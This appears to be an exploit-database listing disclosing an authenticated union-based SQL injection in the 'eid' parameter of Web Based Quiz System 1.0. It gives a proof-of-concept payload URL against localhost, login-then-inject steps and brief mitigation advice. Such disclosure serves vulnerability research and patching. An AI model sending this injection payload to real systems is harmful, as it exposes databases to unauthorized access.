header-logo
Suggest Exploit
vendor:
Web Based Quiz System
by:
Deepak Kumar Bharti
8.8
CVSS
HIGH
SQL Injection
89
CWE
Product Name: Web Based Quiz System
Affected Version From: 1.0
Affected Version To: 1.0
Patch Exists: NO
Related CWE: N/A
CPE: a:sourcecodester:web_based_quiz_system:1.0
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: Windows 10 Pro
2021

Web Based Quiz System 1.0 – ‘eid’ Union Based Sql Injection (Authenticated)

Union Based SQL Injection has been discovered in the Web Based Quiz System created by sourcecodester/janobe in Welcome page in quiz section eid parameter affected from this vulnerability. The attacker can exploit this vulnerability by sending a malicious payload to the vulnerable URL http://localhost/welcome.php?q=quiz&step=2&eid=60377db362694' Union Select 1,database(),database(),4,5-- -&n=2&t=34

Mitigation:

Input validation should be done to prevent SQL Injection attacks. Parameterized queries should be used to prevent SQL Injection attacks. Use of stored procedures can also help in preventing SQL Injection attacks.
Source

Exploit-DB raw data:

# Exploit Title: Web Based Quiz System 1.0 - 'eid' Union Based Sql Injection (Authenticated)
# Date: 04-03-2021
# Exploit Author: Deepak Kumar Bharti
# Vendor Homepage: https://www.sourcecodester.com
# Software Download Link: https://www.sourcecodester.com/php/14727/web-based-quiz-system-phpmysqli-full-source-code.html
# Software: Web Based Quiz System
# Version: 1.0

# Tested on: Windows 10 Pro
# Union Based Sql Injection has been discovered in the Web Based Quiz System created by sourcecodester/janobe
# in Welcome page in quiz section eid parameter affected from this vulnerability.
# URL: http://localhost/welcome.php?q=quiz&step=2&eid=60377db362694' Union Select 1,database(),database(),4,5-- -&n=2&t=34

POC:
# go to url http://localhost/login.php
# then you have to login with default creds
# then go to quiz and execute the payload ie:--
http://localhost/welcome.php?q=quiz&step=2&eid=60377db362694' Union Select 1,database(),database(),4,5-- -&n=2&t=34

Navigation

Suggest Exploit

Services By CQR